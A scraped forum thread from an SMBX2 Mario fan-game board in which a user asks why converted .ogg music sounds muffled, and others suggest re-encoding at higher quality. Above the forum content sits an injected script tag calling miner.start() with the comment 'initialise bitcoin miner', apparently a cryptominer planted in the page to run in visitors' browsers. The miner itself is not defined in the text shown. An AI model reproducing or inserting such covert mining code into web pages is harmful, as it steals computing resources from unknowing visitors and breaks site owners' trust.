<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

Custom Music sounds weird

User avatar
sjl057
Sam Deluxe
Posts: 14
Joined: 1 year ago
Location: Snited Utates

Custom Music sounds weird

Postby sjl057 » 1 year ago

Just got the PAL build, and had a sudden idea for a level. So, I got the music for it, converted it to .ogg in Audacity, so I could loop it, and then realized that both in the editor and the game, the music sounds like I'm underwater. However, the original file sounds completely normal.

Here's a video of this in action (If it's not opening, give it a bit, it could still be uploading to Google Drive):
https://drive.google.com/file/d/1A7wJDb ... sp=sharing

Any ideas?
I believe in LunaLUA

And I'd believe in it more if every library wasn't deprecated

and if i knew lua in the first place

User avatar
tangy
black and red
Posts: 722
Joined: 5 years ago
Pronouns: null
Location: Atlanta

Re: Custom Music sounds weird

Postby tangy » 1 year ago

Sounds perfectly fine to me
Image Avatar by Loni/sonicspin
raocow wrote:I am being shot at, and I am being advertised petrol at the same time. We must be in America.
Image
Image
Image

User avatar
Wohlstand
PGE, TheXTech, and LunaLUA developer
Posts: 174
Joined: 6 years ago
First name: Vitaly
Pronouns: he/him/his
Location: Moscow, Russia

Re: Custom Music sounds weird

Postby Wohlstand » 5 months ago

Why "underwater"? I guess, you did choose too low quality, try to re-convert it again, but please choose a higher quality level while saving a file.

User avatar
Hoeloe
A2XT person
Posts: 941
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: Custom Music sounds weird

Postby Hoeloe » 5 months ago

Wohl uh... this post is from 7 months ago. I doubt it's still relevant.
Image
Image
Image
Image
Image

User avatar
Wohlstand
PGE, TheXTech, and LunaLUA developer
Posts: 174
Joined: 6 years ago
First name: Vitaly
Pronouns: he/him/his
Location: Moscow, Russia

Re: Custom Music sounds weird

Postby Wohlstand » 5 months ago

Hoeloe wrote: Wohl uh... this post is from 7 months ago. I doubt it's still relevant.
Sorry, I didn't point attention to the date. I was found that it's "unread" here and I have replied as here were no adequate solution answers. So, I gave my own opinion on this.


Return to “SMBX2 (Current - 2.0 Beta 4)”

Who is online

Users browsing this forum: No registered users and 1 guest